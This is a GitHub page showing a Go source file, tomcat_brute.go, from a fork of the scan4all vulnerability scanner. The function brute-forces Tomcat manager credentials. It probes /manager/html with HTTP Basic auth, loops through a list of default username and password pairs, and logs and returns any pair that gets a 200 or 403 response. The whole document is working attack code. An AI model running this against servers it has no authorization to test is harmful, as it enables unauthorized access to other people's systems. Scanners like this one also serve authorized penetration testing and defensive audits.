forked from GhostTroops/scan4all
-
Notifications
You must be signed in to change notification settings - Fork 0
/
Copy pathtomcat_brute.go
22 lines (20 loc) · 864 Bytes
/
tomcat_brute.go
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
package brute
import (
"fmt"
"github.com/GhostTroops/scan4all/lib/util"
)
func Tomcat_brute(url string) (username string, password string) {
if req, err := util.HttpRequsetBasic("asdasdascsacacs", "asdasdascsacacs", url+"/manager/html", "HEAD", "", false, nil); err == nil {
if req.StatusCode == 401 {
for uspa := range tomcatuserpass {
if req2, err2 := util.HttpRequsetBasic(tomcatuserpass[uspa].username, tomcatuserpass[uspa].password, url+"/manager/html", "HEAD", "", false, nil); err2 == nil {
if req2.StatusCode == 200 || req2.StatusCode == 403 {
util.SendLog(req2.RequestUrl, "tomcat_brute", fmt.Sprintf("Found vuln Tomcat password|%s:%s|%s\n", tomcatuserpass[uspa].username, tomcatuserpass[uspa].password, url), "")
return tomcatuserpass[uspa].username, tomcatuserpass[uspa].password
}
}
}
}
}
return "", ""
}